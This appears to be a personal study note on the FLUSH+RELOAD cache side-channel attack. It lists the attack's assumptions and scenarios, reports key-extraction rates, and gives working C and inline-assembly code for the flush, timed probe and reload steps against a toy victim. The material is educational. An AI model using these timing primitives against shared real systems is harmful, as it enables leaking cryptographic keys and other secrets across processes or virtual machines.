FLUSH+RELOAD

Creator
Creator
Seonglae Cho
Created
Created
2024 Jun 3 5:16
Editor
Edited
Edited
2024 Jun 7 4:28
Refs
Refs

FLUSH+RELOAD Steps

notion image

FLUSH Step

Assumptions for flushing the LLC (Last-Level Cache)
  • Page sharing (due, e.g., to deduplication)
  • Unprivileged cache flush instruction
  • Cache inclusiveness to prevent non-exclusive
    Multilevel Caches
    like level 1 data is not in level 2
void flush() { int i; // Write to array to bring it to RAM (e.g., could have been paged-out) for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1; // Flush the values of the array from cache for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]); }

RELOAD Step

C volatile
variable for cache inclusiveness
int probe(uint8_t *adrs) { volatile unsigned long time; asm __volatile__( " mfence \n" " lfence \n" " rdtsc \n" " lfence \n" " movl %%eax, %%esi \n" " movl (%1), %%eax \n" " lfence \n" " rdtsc \n" " subl %%esi, %%eax \n" " clflush 0(%1) \n" : "=a" (time) : "c" (adrs) : "%esi", "%edx" ); return time < CACHE_HIT_THRESHOLD; } void reload() { int junk = 0; uint8_t *adrs; int i; for (i = 0; i < 256; i++) { adrs = &array[i*4096 + DELTA]; if ( probe(adrs) ) { printf("array[%d*4096 + %d] is in cache.\n", i, DELTA); printf("The secret = %d.\n", i); } } }
This code access 256 times with 4096 byte padding spacial
Cache Locality
to avoid using same
Cache Line
unit.

Attack Scenarios

  • Shared Last Level Cache (LLC) with different processor cores
  • Same-OS/Co-located-VM scenarios with OS/VM uses page deduplication
By observing a single signing or decryption round, the attack extracts 98.7% of the bits on average in the same OS scenario and 96.7% in the cross-VM scenario, with a worst case of 95% and 90%, respectively.

Victim Program

Assumption: there is a victim function that uses a secret value as an index to load some values from an array, as follows
void victim(char secret) { temp = array[secret * 4096 + DELTA]; }
 
 
 
 
 

Recommendations